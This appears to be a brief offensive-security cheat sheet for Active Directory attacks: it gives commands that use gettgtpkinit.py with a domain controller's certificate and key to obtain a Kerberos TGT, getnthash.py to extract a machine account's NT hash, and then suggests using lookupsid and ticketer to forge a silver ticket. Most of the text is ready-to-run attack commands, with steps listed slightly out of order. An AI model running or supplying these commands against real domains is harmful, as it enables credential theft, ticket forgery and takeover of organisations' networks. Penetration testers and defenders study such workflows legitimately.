#
getnthash.py
Helps to get the NT hash of things (after using gettgtpkinit.py to get the AS-REP key that accompanies a TGT, for example).
#
Extract NT hash
This step requires the AS-REP key you got as part of using gettgtpkinit
export KRB5CCNAME=x.ccache
getnthash.py domain.com/server123\$ -key THE-AS-REP-HASH
#
Request a TGT using a certificate and private key
gettgtpkinit.py -cert-pfx dc.pfx -pfx-pass 123456 domain.com/dc$ dc.ccacheArmed with this hash, you could grab the domain SID with lookupsid and then forge a silver ticket with ticketer.